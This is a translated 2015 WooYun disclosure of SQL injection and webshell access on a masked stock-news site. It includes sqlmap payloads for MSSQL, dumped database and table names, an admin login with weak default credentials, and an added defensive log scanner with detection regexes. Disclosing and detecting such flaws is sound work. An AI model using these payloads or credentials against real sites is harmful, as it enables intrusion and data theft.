Vulnerability summary

Defect ID: wooyun-2015-0150054

Title: Two SQL injection points / getshell on a stock website run by 深度数据

Affected vendor: 捷利港信(香港)有限公司

Author: me1ody

Submitted: 2015-10-30 22:04

Fixed: 2015-12-19 14:34

Published: 2015-12-19 14:34

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-30: Details sent to the vendor, awaiting vendor handling
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and domain experts
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public

Brief description:

- -

Detailed description:

Injection points

http://**.**.**.**/News/Default.aspx?Kind=c00001
http://**.**.**.**/hk/industrymore.aspx?q=Block


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Kind (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Kind=c00001' AND 4379=4379 AND 'nWHD'='nWHD
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Kind=c00001' AND 9281=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9281=9281) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'FGZO'='FGZO
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: Kind=c00001' AND 8769=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'OYYN'='OYYN
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] His_TTGame
[*] master
[*] model
[*] msdb
[*] News
[*] newstmpmessage
[*] ReportServer
[*] ReportServerTempDB
[*] SHEX_Game
[*] StockData
[*] tempdb
[*] Tsci_tt
[*] tt180
[*] TTGame
Database: News
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.NS_MessageKinds_bak201508 | 1168587 |
| dbo.ObjectRelation | 1069242 |
| dbo.NS_MessageKinds | 466832 |
| dbo.NS_Message | 323364 |
| dbo.NS_Announcement | 264046 |
| dbo.Channel_Message | 195370 |
| dbo.NS_US_news | 139042 |
| dbo.NS_PickMessage | 124636 |
| dbo.View_KindNews | 120312 |
| dbo.NS_MessageKinds_bakJanyo | 105599 |
| dbo.NS_PickMessageHistory | 101098 |
| dbo.NS_MessageKinds20130523 | 94807 |
| dbo.Query | 87429 |
| dbo.TT_HKNotice | 86563 |
| dbo.UserSubscribeChannel | 54730 |
| dbo.TMP_PickMessage | 31699 |
| dbo.tmpall | 23181 |
| dbo.TT_News_Hot | 11734 |
| dbo.NS_RecordLog | 4512 |
| dbo.view_NewsLists | 3322 |
| dbo.TT_User | 3041 |
| dbo.TT_User_bak | 2457 |
| dbo.stockcode | 2022 |
| dbo.tempNS_PickMessage | 1921 |
| dbo.TT_CustomSTK | 1834 |
| dbo.News_Comments | 1228 |
| dbo.HotNewstag | 1065 |
| dbo.NS_NewsSendMsg | 1035 |
| dbo.TT_HKNotice_bak | 1000 |
| dbo.FocusNews | 791 |
| dbo.view_EveryDayEditCountByUser | 393 |
| dbo.TT_BBS | 298 |
| dbo.view_jyb_news_comments | 246 |
| dbo.TT_User_Do | 245 |
| dbo.GeneralWords | 238 |
| dbo.CommonChannel | 191 |
| dbo.view_jyb_hotNews | 42 |
| dbo.NS_NewsPageSettings | 31 |
| dbo.tmpaaaaa | 22 |
| dbo.V_PageSetings | 20 |
| dbo.NS_Admin | 19 |
| dbo.Company | 15 |
| dbo.NS_subKinds | 15 |
| dbo.View_IM_CompanyLists | 12 |
| dbo.LSB | 11 |
| dbo.NS_NewsMoveStat | 8 |
| dbo.tempExceptHot | 7 |
| dbo.D99_REG | 1 |
| dbo.NS_UserGetEditPickNews | 1 |
+----------------------------------+---------+
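The three sqlmap techniques recorded above (boolean-based blind, error-based via CONVERT(INT, ...), and the heavy-query time-based blind built on sysusers self-joins) leave recognizable traces in web server logs. The following is an added defender-side example, not part of the original report or the affected site's code: it scans IIS W3C log lines for those signatures. The log lines, client IPs and field layout are constructed assumptions, and the probe payloads are shortened forms of the ones sqlmap printed.

```python
import re
from urllib.parse import parse_qs

# Signatures for the three sqlmap techniques recorded in this report: boolean-based
# blind, error-based CONVERT(INT, ...), and heavy-query time-based blind on sysusers.
SIGNATURES = {
    "boolean_blind": re.compile(r"'\s*AND\s+\d+\s*=\s*\d+\s+AND\s*'", re.I),
    "error_based_convert": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "heavy_query_sysusers": re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*,\s*sysusers", re.I),
}

def classify_query(query):
    """Return (param, technique) pairs for every decoded query value that matches."""
    findings = []
    # parse_qs URL-decodes values, so '+' and %27 become the raw payload text.
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            for technique, pattern in SIGNATURES.items():
                if pattern.search(value):
                    findings.append((param, technique))
    return findings

def scan_iis_log(lines):
    """Scan IIS W3C log lines; return (client_ip, uri_stem, param, technique) hits.
    Assumed field order (constructed sample): date time s-ip cs-method cs-uri-stem
    cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):   # skip W3C header/comment lines
            continue
        fields = line.split(" ")
        if len(fields) < 11:
            continue
        uri_stem, query, client_ip = fields[4], fields[5], fields[8]
        if query == "-":                        # IIS logs '-' when no query string
            continue
        for param, technique in classify_query(query):
            hits.append((client_ip, uri_stem, param, technique))
    return hits

# Constructed sample log: a benign request, three sqlmap probes against the
# Kind parameter (shortened payloads), and a benign request to the second page.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-10-30 14:02:11 10.0.0.5 GET /News/Default.aspx Kind=c00001 80 - 203.0.113.7 Mozilla/5.0 200
2015-10-30 14:02:13 10.0.0.5 GET /News/Default.aspx Kind=c00001%27+AND+4379%3D4379+AND+%27nWHD%27%3D%27nWHD 80 - 203.0.113.7 sqlmap/1.0 200
2015-10-30 14:02:14 10.0.0.5 GET /News/Default.aspx Kind=c00001%27+AND+9281%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29+AND+%27FGZO%27%3D%27FGZO 80 - 203.0.113.7 sqlmap/1.0 500
2015-10-30 14:02:20 10.0.0.5 GET /News/Default.aspx Kind=c00001%27+AND+8769%3D%28SELECT+COUNT%28%2A%29+FROM+sysusers+AS+sys1%2Csysusers+AS+sys2%29+AND+%27OYYN%27%3D%27OYYN 80 - 203.0.113.7 sqlmap/1.0 200
2015-10-30 14:03:01 10.0.0.5 GET /hk/industrymore.aspx q=Block 80 - 198.51.100.9 Mozilla/5.0 200
""".splitlines()
```

Running scan_iis_log(SAMPLE_LOG) flags only the three probe lines from 203.0.113.7, one per technique, and nothing for the benign requests.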

Proof of vulnerability:

getshell
Admin panel address

http://**.**.**.**/admin/Default.aspx


admin 123456

[screenshot: 1.png]

[screenshot: 11.png]

[screenshot: 2.png]

So many databases.

[screenshot: 3.png]

Looks like it could be used to pivot into the intranet - -
The webshell was removed by me; nothing was downloaded.

Remediation:

- -

Copyright notice: please credit the source when reposting: me1ody@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-04 14:32

Vendor reply:

No direct handling channel has yet been established with the organization that administers the website; pending claim.

Latest status:

None yet